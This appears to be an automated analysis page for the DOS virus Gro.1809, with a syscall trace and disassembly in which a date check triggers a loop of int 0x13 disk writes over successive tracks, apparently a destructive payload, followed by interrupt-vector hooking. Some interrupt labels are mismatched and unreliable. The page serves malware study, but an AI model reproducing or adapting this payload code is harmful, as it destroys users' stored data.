Sample viewer

vx.netlux.org/Virus.DOS.Gro.1809

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:10:42.659606063Z 234 PC: 12ac2 | UNKNOWN!
2018-12-17T22:10:42.660565312Z 42 PC: 12ad0 | Get date 0x12ad0: mov ax, 0xffff
0x12ad3: mov ds, ax
0x12ad5: mov ax, word ptr [8]
0x12ad8: mov bx, 0x300a
0x12adb: sub al, bh
0x12add: sub ah, bh
0x12adf: mov dh, ah
0x12ae1: cwde
0x12ae2: mul bl
0x12ae4: add al, dh
0x12ae6: cmp al, dl
0x12ae8: jne 0x12b11
0x12aea: call 0x12e55
0x12aed: mov dx, 0x8000
0x12af0: mov cx, 1
0x12af3: mov ax, 0xb01
0x12af6: int 0x13
0x12af8: inc ch
0x12afa: jne 0x12af3
0x12afc: inc dh
2018-12-17T22:10:42.662553172Z 53 PC: 12b18 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:10:42.66352614Z 53 PC: 13037 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.665006385Z 37 PC: 1304c | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.666634068Z 37 PC: 1306c | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.667706857Z 53 PC: 12b50 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:10:42.669085498Z 53 PC: 13037 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.677765647Z 37 PC: 1304c | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.678738928Z 48 PC: 1305e | Get DOS version
2018-12-17T22:10:42.680474613Z 37 PC: 1306c | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:10:42.681710337Z 37 PC: 12bc5 | Set interrupt vector (Interrupt = '33' AKA 'Random read')